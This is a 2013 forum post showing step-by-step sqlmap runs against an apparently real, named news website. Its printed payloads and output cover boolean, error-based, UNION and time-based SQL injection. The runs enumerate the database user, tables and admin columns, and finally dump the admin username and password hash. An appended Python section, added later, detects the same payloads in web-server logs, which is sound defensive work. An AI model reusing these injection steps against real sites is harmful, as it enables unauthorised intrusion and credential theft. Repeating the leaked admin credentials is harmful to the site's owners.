中国网络渗透测试联盟

Title: sqlmap example: injecting MySQL

Author: admin    Time: 2013-4-4 22:18
Title: sqlmap example: injecting MySQL
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
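The session above reaches the admin table through four distinct sqlmap techniques on the id parameter (boolean-based, error-based via FLOOR(RAND(0)*2) GROUP BY, UNION ALL SELECT, and SLEEP()). As an added example that is not part of the original post, the Python below turns those four payload shapes into signatures and runs them over constructed Apache access-log lines, which is what the same traffic looks like from the web server's side; the log lines, the client address 203.0.113.5 and the combined-log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl
# Signatures for the four techniques sqlmap reported above: (label, regex on each decoded query value)
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
    ("error-based (FLOOR/RAND GROUP BY)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
]

# Apache combined-log line: client, identity, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target):
    # parse_qsl decodes %xx and '+', so the regexes see the payload as the DBMS would.
    hits = []
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for label, pattern in SIGNATURES:
            if label not in hits and pattern.search(value):
                hits.append(label)
    return hits

def scan_log(lines):
    # (client ip, technique labels, request target) for every parseable line that matches a signature
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):
        labels = classify_request(m.group("target"))
        if labels:
            findings.append((m.group("ip"), labels, m.group("target")))
    return findings

def suspicious_sources(findings, min_techniques=2):
    # One client cycling through several techniques is the footprint of an automated scanner.
    by_ip = {}
    for ip, labels, _target in findings:
        by_ip.setdefault(ip, set()).update(labels)
    return {ip: sorted(t) for ip, t in by_ip.items() if len(t) >= min_techniques}

# Constructed sample log lines (not from the post); payloads mirror the thread's, percent-encoded as logged.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),'
    'CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404%3D8404)%20THEN%201%20ELSE%200%20END)),'
    'CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 312',
    '203.0.113.5 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,'
    'CONCAT(CHAR(58,99,118,120,58),CHAR(32),CHAR(58,110,99,118,58)),NULL,NULL,NULL%23 HTTP/1.1" 200 5300',
    '203.0.113.5 - - [04/Apr/2013:16:53:57 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
]
```

Note that the session above reports "0 HTTP(s) requests" only because sqlmap resumed from its session file; the original probing run would have produced many such lines from one address in a short window, which is what suspicious_sources keys on.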




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2